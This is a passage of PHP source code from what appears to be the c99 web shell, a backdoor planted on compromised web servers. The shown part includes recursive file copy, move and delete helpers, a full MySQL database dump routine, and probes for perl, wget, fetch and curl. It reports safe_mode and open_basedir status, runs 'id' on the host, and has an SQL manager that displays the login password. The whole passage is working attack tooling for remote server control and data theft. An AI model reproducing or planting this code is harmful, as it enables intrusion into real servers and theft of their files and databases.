 670         if (($o != ".") and ($o != "..")) {
 671           if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
 672           else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
 673           if (!$ret) {return $ret;}
 674         }
 675       }
 676       closedir($h);
 677       return TRUE;
 678     }
 679   }
 680   if (!function_exists("fs_copy_obj")) {
 681     function fs_copy_obj($d,$t) {
 682       $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 683       $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 684       if (!is_dir(dirname($t))) {mkdir(dirname($t));}
 685       if (is_dir($d)) {
 686         if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 687         if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
 688         return fs_copy_dir($d,$t);
 689       }
 690       elseif (is_file($d)) { return copy($d,$t); }
 691       else { return FALSE; }
 692     }
 693   }
 694   if (!function_exists("fs_move_dir")) {
 695     function fs_move_dir($d,$t) {
 696       $h = opendir($d);
 697       if (!is_dir($t)) {mkdir($t);}
 698       while (($o = readdir($h)) !== FALSE) {
 699         if (($o != ".") and ($o != "..")) {
 700           $ret = TRUE;
 701           if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
 702           else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
 703           if (!$ret) {return $ret;}
 704         }
 705       }
 706       closedir($h);
 707       return TRUE;
 708     }
 709   }
 710   if (!function_exists("fs_move_obj")) {
 711     function fs_move_obj($d,$t) {
 712       $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 713       $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 714       if (is_dir($d)) {
 715         if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 716         if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
 717         return fs_move_dir($d,$t);
 718       }
 719       elseif (is_file($d)) {
 720         if(copy($d,$t)) {return unlink($d);}
 721         else {unlink($t); return FALSE;}
 722       }
 723       else {return FALSE;}
 724     }
 725   }
 726   if (!function_exists("fs_rmdir")) {
 727     function fs_rmdir($d) {
 728       $h = opendir($d);
 729       while (($o = readdir($h)) !== FALSE) {
 730         if (($o != ".") and ($o != "..")) {
 731           if (!is_dir($d.$o)) {unlink($d.$o);}
 732           else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
 733         }
 734       }
 735       closedir($h);
 736       rmdir($d);
 737       return !is_dir($d);
 738     }
 739   }
 740   if (!function_exists("fs_rmobj")) {
 741     function fs_rmobj($o) {
 742       $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
 743       if (is_dir($o)) {
 744         if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
 745         return fs_rmdir($o);
 746       }
 747       elseif (is_file($o)) {return unlink($o);}
 748       else {return FALSE;}
 749     }
 750   }
 751   if (!function_exists("tabsort")) {
 752     function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}
 753   }
 754   if (!function_exists("view_perms")) {
 755     function view_perms($mode) {
 756       if (($mode & 0xC000) === 0xC000) {$type = "s";}
 757       elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 758       elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 759       elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 760       elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 761       elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 762       elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 763       else {$type = "?";}
 764       $owner["read"] = ($mode & 00400)?"r":"-";
 765       $owner["write"] = ($mode & 00200)?"w":"-";
 766       $owner["execute"] = ($mode & 00100)?"x":"-";
 767       $group["read"] = ($mode & 00040)?"r":"-";
 768       $group["write"] = ($mode & 00020)?"w":"-";
 769       $group["execute"] = ($mode & 00010)?"x":"-";
 770       $world["read"] = ($mode & 00004)?"r":"-";
 771       $world["write"] = ($mode & 00002)? "w":"-";
 772       $world["execute"] = ($mode & 00001)?"x":"-";
 773       if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
 774       if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
 775       if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
 776       return $type.join("",$owner).join("",$group).join("",$world);
 777     }
 778   }
 779   if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
 780   if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
 781   if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
 782   if (!function_exists("parse_perms")) {
 783     function parse_perms($mode) {
 784       if (($mode & 0xC000) === 0xC000) {$t = "s";}
 785       elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 786       elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 787       elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 788       elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 789       elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 790       elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 791       else {$t = "?";}
 792       $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 793       $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 794       $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 795       return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
 796     }
 797   }
 798   if (!function_exists("parsesort")) {
 799     function parsesort($sort) {
 800       $one = intval($sort);
 801       $second = substr($sort,-1);
 802       if ($second != "d") {$second = "a";}
 803       return array($one,$second);
 804     }
 805   }
 806   if (!function_exists("view_perms_color")) {
 807     function view_perms_color($o) {
 808       if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
 809       elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
 810       else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
 811     }
 812   }
 813   if (!function_exists("mysql_dump")) {
 814     function mysql_dump($set) {
 815       global $sh_ver;
 816       $sock = $set["sock"];
 817       $db = $set["db"];
 818       $print = $set["print"];
 819       $nl2br = $set["nl2br"];
 820       $file = $set["file"];
 821       $add_drop = $set["add_drop"];
 822       $tabs = $set["tabs"];
 823       $onlytabs = $set["onlytabs"];
 824       $ret = array();
 825       $ret["err"] = array();
 826       if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
 827       if (empty($db)) {$db = "db";}
 828       if (empty($print)) {$print = 0;}
 829       if (empty($nl2br)) {$nl2br = 0;}
 830       if (empty($add_drop)) {$add_drop = TRUE;}
 831       if (empty($file)) {
 832         $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
 833       }
 834       if (!is_array($tabs)) {$tabs = array();}
 835       if (empty($add_drop)) {$add_drop = TRUE;}
 836       if (sizeof($tabs) == 0) {
 837         //Retrieve tables-list
 838         $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
 839         if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
 840       }
 841       $out = "
 842       # Dumped by ".$sh_name."
 843       #
 844       # Host settings:
 845       # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
 846       # Date: ".date("d.m.Y H:i:s")."
 847       # DB: \"".$db."\"
 848       #---------------------------------------------------------";
 849       $c = count($onlytabs);
 850       foreach($tabs as $tab) {
 851         if ((in_array($tab,$onlytabs)) or (!$c)) {
 852           if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
 853           //Receieve query for create table structure
 854           $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
 855           if (!$res) {$ret["err"][] = mysql_smarterror();}
 856           else {
 857             $row = mysql_fetch_row($res);
 858             $out .= $row["1"].";\n\n";
 859             //Receieve table variables
 860             $res = mysql_query("SELECT * FROM `$tab`", $sock);
 861             if (mysql_num_rows($res) > 0) {
 862               while ($row = mysql_fetch_assoc($res)) {
 863                 $keys = implode("`, `", array_keys($row));
 864                 $values = array_values($row);
 865                 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
 866                 $values = implode("', '", $values);
 867                 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
 868                 $out .= $sql;
 869               }
 870             }
 871           }
 872         }
 873       }
 874       $out .= "#---------------------------------------------------------------------------------\n\n";
 875       if ($file) {
 876         $fp = fopen($file, "w");
 877         if (!$fp) {$ret["err"][] = 2;}
 878         else {
 879           fwrite ($fp, $out);
 880           fclose ($fp);
 881         }
 882       }
 883       if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
 884       return $out;
 885     }
 886   }
 887   if (!function_exists("mysql_buildwhere")) {
 888     function mysql_buildwhere($array,$sep=" and",$functs=array()) {
 889       if (!is_array($array)) {$array = array();}
 890       $result = "";
 891       foreach($array as $k=>$v) {
 892         $value = "";
 893         if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
 894         $value .= "'".addslashes($v)."'";
 895         if (!empty($functs[$k])) {$value .= ")";}
 896         $result .= "`".$k."` = ".$value.$sep;
 897       }
 898       $result = substr($result,0,strlen($result)-strlen($sep));
 899       return $result;
 900     }
 901   }
 902   if (!function_exists("mysql_fetch_all")) {
 903     function mysql_fetch_all($query,$sock) {
 904       if ($sock) {$result = mysql_query($query,$sock);}
 905       else {$result = mysql_query($query);}
 906       $array = array();
 907       while ($row = mysql_fetch_array($result)) {$array[] = $row;}
 908       mysql_free_result($result);
 909       return $array;
 910     }
 911   }
 912   if (!function_exists("mysql_smarterror")) {
 913     function mysql_smarterror($type,$sock) {
 914       if ($sock) {$error = mysql_error($sock);}
 915       else {$error = mysql_error();}
 916       $error = htmlspecialchars($error);
 917       return $error;
 918     }
 919   }
 920   if (!function_exists("mysql_query_form")) {
 921     function mysql_query_form() {
 922       global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
 923       if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
 924       if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
 925       if ((!$submit) or ($sql_act)) {
 926         echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
 927         if ($tbl_struct) {
 928           echo "<td valign=\"top\"><b>Fields:</b><br>";
 929           foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
 930           echo "</td></tr></table>";
 931         }
 932       }
 933       if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
 934     }
 935   }
 936   if (!function_exists("mysql_create_db")) {
 937     function mysql_create_db($db,$sock="") {
 938       $sql = "CREATE DATABASE `".addslashes($db)."`;";
 939       if ($sock) {return mysql_query($sql,$sock);}
 940       else {return mysql_query($sql);}
 941     }
 942   }
 943   if (!function_exists("mysql_query_parse")) {
 944     function mysql_query_parse($query) {
 945       $query = trim($query);
 946       $arr = explode (" ",$query);
 947       $types = array(
 948         "SELECT"=>array(3,1),
 949         "SHOW"=>array(2,1),
 950         "DELETE"=>array(1),
 951         "DROP"=>array(1)
 952       );
 953       $result = array();
 954       $op = strtoupper($arr[0]);
 955       if (is_array($types[$op])) {
 956         $result["propertions"] = $types[$op];
 957         $result["query"]  = $query;
 958         if ($types[$op] == 2) {
 959           foreach($arr as $k=>$v) {
 960             if (strtoupper($v) == "LIMIT") {
 961               $result["limit"] = $arr[$k+1];
 962               $result["limit"] = explode(",",$result["limit"]);
 963               if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
 964               unset($arr[$k],$arr[$k+1]);
 965             }
 966           }
 967         }
 968       }
 969       else {return FALSE;}
 970     }
 971   }
 972   if (!function_exists("c99fsearch")) {
 973     function c99fsearch($d) {
 974       global $found;
 975       global $found_d;
 976       global $found_f;
 977       global $search_i_f;
 978       global $search_i_d;
 979       global $a;
 980       if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 981       $h = opendir($d);
 982       while (($f = readdir($h)) !== FALSE) {
 983         if($f != "." && $f != "..") {
 984           $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
 985           if (is_dir($d.$f)) {
 986             $search_i_d++;
 987             if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
 988             if (!is_link($d.$f)) {c99fsearch($d.$f);}
 989           }
 990           else {
 991             $search_i_f++;
 992             if ($bool) {
 993               if (!empty($a["text"])) {
 994                 $r = @file_get_contents($d.$f);
 995                 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
 996                 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
 997                 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
 998                 else {$bool = strpos(" ".$r,$a["text"],1);}
 999                 if ($a["text_not"]) {$bool = !$bool;}
1000                 if ($bool) {$found[] = $d.$f; $found_f++;}
1001               }
1002               else {$found[] = $d.$f; $found_f++;}
1003             }
1004           }
1005         }
1006       }
1007       closedir($h);
1008     }
1009   }
1010   if ($act == "gofile") {
1011     if (is_dir($f)) { $act = "ls"; $d = $f; }
1012     else { $act = "f"; $d = dirname($f); $f = basename($f); }
1013   }
1014   //Sending Headers
1015   @ob_start();
1016   @ob_implicit_flush(0);
1017   function onphpshutdown() {
1018     global $gzipencode,$ft;
1019     if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
1020       $v = @ob_get_contents();
1021       @ob_end_clean();
1022       @ob_start("ob_gzHandler");
1023       echo $v;
1024       @ob_end_flush();
1025     }
1026   }
1027   function c99shexit() {
1028     onphpshutdown();
1029     exit;
1030   }
1031   header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
1032   header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
1033   header("Cache-Control: no-store, no-cache, must-revalidate");
1034   header("Cache-Control: post-check=0, pre-check=0", FALSE);
1035   header("Pragma: no-cache");
1036   //Setting Temporary Dir
1037   if (empty($tmpdir)) {
1038     $tmpdir = ini_get("upload_tmp_dir");
1039     if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
1040   }
1041   $tmpdir = realpath($tmpdir);
1042   $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
1043   if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
1044   if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
1045   else {$tmpdir_logs = realpath($tmpdir_logs);}
1046   //Getting Status
1047   function showstat($stat) {
1048     if ($stat=="on") { return "<font color=#00FF00><b>ON</b></font>"; }
1049     else { return "<font color=#FF9900><b>OFF</b></font>"; }
1050   }
1051   function testperl() {
1052     if (ex('perl -h')) { return showstat("on"); }
1053     else { return showstat("off"); }
1054   }
1055   function testfetch() {
1056     if(ex('fetch --help')) { return showstat("on"); }
1057     else { return showstat("off"); }
1058   }
1059   function testwget() {
1060     if (ex('wget --help')) { return showstat("on"); }
1061     else { return showstat("off"); }
1062   }
1063   function testoracle() {
1064     if (function_exists('ocilogon')) { return showstat("on"); }
1065     else { return showstat("off"); }
1066   }
1067   function testpostgresql() {
1068     if (function_exists('pg_connect')) { return showstat("on"); }
1069     else { return showstat("off"); }
1070   }
1071   function testmssql() {
1072     if (function_exists('mssql_connect')) { return showstat("on"); }
1073     else { return showstat("off"); }
1074   }
1075   function testcurl() {
1076     if (function_exists('curl_version')) { return showstat("on"); }
1077     else { return showstat("off"); }
1078   }
1079   function testmysql() {
1080     if (function_exists('mysql_connect')) { return showstat("on"); }
1081     else { return showstat("off"); }
1082   }
1083   function showdisablefunctions() {
1084     if ($disablefunc=@ini_get("disable_functions")){ return "<font color=#FF9900><b>".$disablefunc."</b></font>"; }
1085     else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
1086   }
1087   //Getting Safe Mode Status
1088   if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
1089     $safemode = TRUE;
1090     $hsafemode = "<font color=#3366FF><b>SAFE MODE is ON (Secure)</b></font>";
1091   }
1092   else {
1093     $safemode = FALSE;
1094     $hsafemode = "<font color=#FF9900><b>SAFE MODE is OFF (Not Secure)</b></font>";
1095   }
1096   $v = @ini_get("open_basedir");
1097   if ($v or strtolower($v) == "on") {
1098     $openbasedir = TRUE;
1099     $hopenbasedir = "<font color=red>".$v."</font>";
1100   }
1101   else {
1102     $openbasedir = FALSE;
1103     $hopenbasedir = "<font color=green>OFF (not secure)</font>";
1104   }
1105   $sort = htmlspecialchars($sort);
1106   if (empty($sort)) {$sort = $sort_default;}
1107   $sort[1] = strtolower($sort[1]);
1108   $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
1109   if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
1110   $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
1111   @ini_set("highlight.bg",$highlight_bg);
1112   @ini_set("highlight.comment",$highlight_comment);
1113   @ini_set("highlight.default",$highlight_default);
1114   @ini_set("highlight.html",$highlight_html);
1115   @ini_set("highlight.keyword",$highlight_keyword);
1116   @ini_set("highlight.string",$highlight_string);
1117   if (!is_array($actbox)) { $actbox = array(); }
1118   $dspact = $act = htmlspecialchars($act);
1119   $disp_fullpath = $ls_arr = $notls = null;
1120   $ud = urlencode($d);
1121   //Directory
1122   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
1123   if (empty($d)) {$d = realpath(".");}
1124   elseif(realpath($d)) {$d = realpath($d);}
1125   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
1126   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
1127   $d = str_replace("\\\\","\\",$d);
1128   $dispd = htmlspecialchars($d);
1129 /***** HTML START *****/
1130 echo $html_start;
1131 echo "<div class=barheader2><h3>$sh_name</h3>.: No System is Perfectly Safe :.</div>\n";
1132 echo "<table id=pagebar><tr><td width=50%><p>".
1133      "Software : ".$DISP_SERVER_SOFTWARE ." - <a href=".$surl."act=phpini>php.ini</a><br>".
1134      "$hsafemode<br>".
1135      "OS : ".php_uname()."<br>";
1136 if (!$win) { echo "User ID : ".myshellexec("id"); }
1137 else { echo "User : " . get_current_user(); }
1138 echo "</p></td>".
1139      "<td width=50%><p>Server IP : <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a> - ".
1140      "Your IP : <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a><br>";
1141 if($win){echo "Drives : ".disp_drives($d,$surl)."<br>";}
1142 echo "Freespace : ".disp_freespace($d);
1143 echo "</p></td></tr>";
1144 echo "<tr><td colspan=2><p>";
1145 echo "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql().
1146      " cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
1147 echo "Disabled Functions: ".showdisablefunctions();
1148 echo "</p></td></tr>";
1149 echo "<tr><td colspan=2 id=mainmenu>";
1150 if (count($quicklaunch2) > 0) {
1151   foreach($quicklaunch2 as $item) {
1152     $item[1] = str_replace("%d",urlencode($d),$item[1]);
1153     $item[1] = str_replace("%sort",$sort,$item[1]);
1154     $v = realpath($d."..");
1155     if (empty($v)) {
1156       $a = explode(DIRECTORY_SEPARATOR,$d);
1157       unset($a[count($a)-2]);
1158       $v = join(DIRECTORY_SEPARATOR,$a);
1159     }
1160     $item[1] = str_replace("%upd",urlencode($v),$item[1]);
1161     echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
1162   }
1163 }
1164 echo "</td><tr><td colspan=2 id=mainmenu>";
1165 if (count($quicklaunch1) > 0) {
1166   foreach($quicklaunch1 as $item) {
1167     $item[1] = str_replace("%d",urlencode($d),$item[1]);
1168     $item[1] = str_replace("%sort",$sort,$item[1]);
1169     $v = realpath($d."..");
1170     if (empty($v)) {
1171       $a = explode(DIRECTORY_SEPARATOR,$d);
1172       unset($a[count($a)-2]);
1173       $v = join(DIRECTORY_SEPARATOR,$a);
1174     }
1175     $item[1] = str_replace("%upd",urlencode($v),$item[1]);
1176     echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
1177   }
1178 }
1179 echo "</td></tr><tr><td colspan=2>";
1180 echo "<p class=fleft>";
1181 $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
1182 $i = 0;
1183 foreach($pd as $b) {
1184   $t = ""; $j = 0;
1185   foreach ($e as $r) {
1186     $t.= $r.DIRECTORY_SEPARATOR;
1187     if ($j == $i) { break; }
1188     $j++;
1189   }
1190   echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>";
1191   $i++;
1192 }
1193 echo " - ";
1194 if (is_writable($d)) {
1195   $wd = TRUE;
1196   $wdt = "<font color=#00FF00>[OK]</font>";
1197   echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
1198 }
1199 else {
1200   $wd = FALSE;
1201   $wdt = "<font color=red>[Read-Only]</font>";
1202   echo "<b>".view_perms_color($d)."</b>";
1203 }
1204 ?>
1205 </p>
1206 <div class=fright>
1207 <form method="POST"><input type=hidden name=act value="ls">
1208 Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
1209 </form>
1210 </div>
1211 </td></tr></table>
1212 <?php
1213 //Information Table
1214 echo "<table id=maininfo><tr><td width=\"100%\">\n";
1215 //Action
1216 if ($act == "") { $act = $dspact = "ls"; }
1217 if ($act == "phpini" ) { get_phpini(); }
1218 if ($act == "sql") {
1219   $sql_surl = $surl."act=sql";
1220   if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
1221   if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
1222   if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
1223   if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
1224   if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
1225   $sql_surl .= "&";
1226   echo "<h4>Attention! SQL-Manager is <u>NOT</u> a ready module! Don't reports bugs.</h4>".
1227        "<table>".
1228        "<tr><td width=\"100%\" colspan=2 class=barheader>";
1229   if ($sql_server) {
1230     $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
1231     $err = mysql_smarterror();
1232     @mysql_select_db($sql_db,$sql_sock);
1233     if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
1234   }
1235   else {$sql_sock = FALSE;}
1236   echo ".: SQL Manager :.<br>";
1237   if (!$sql_sock) {
1238     if (!$sql_server) {echo "NO CONNECTION";}
1239     else {echo "Can't connect! ".$err;}
1240   }
1241   else {
1242     $sqlquicklaunch = array();
1243     $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
1244     $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
1245     $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
1246     $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
1247     $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
1248     $sqlquicklaunch[] = array("Logout",$surl."act=sql");
1249     echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
1250     if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
1251   }
1252   echo "</td></tr><tr>";
1253   if (!$sql_sock) {
1254     echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
1255     echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
1256   }
1257   else {
1258     //Start left panel
1259     if (!empty($sql_db)) {
1260       ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
1261       <?php
1262       $result = mysql_list_tables($sql_db);
1263       if (!$result) {echo mysql_smarterror();}
1264       else {
1265         echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
1266         $c = 0;
1267         while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
1268         if (!$c) {echo "No tables found in database.";}
1269       }
1270     }
1271     else {
1272       ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
1273       <?php
1274       $result = mysql_list_dbs($sql_sock);
1275       if (!$result) {echo mysql_smarterror();}
1276       else {
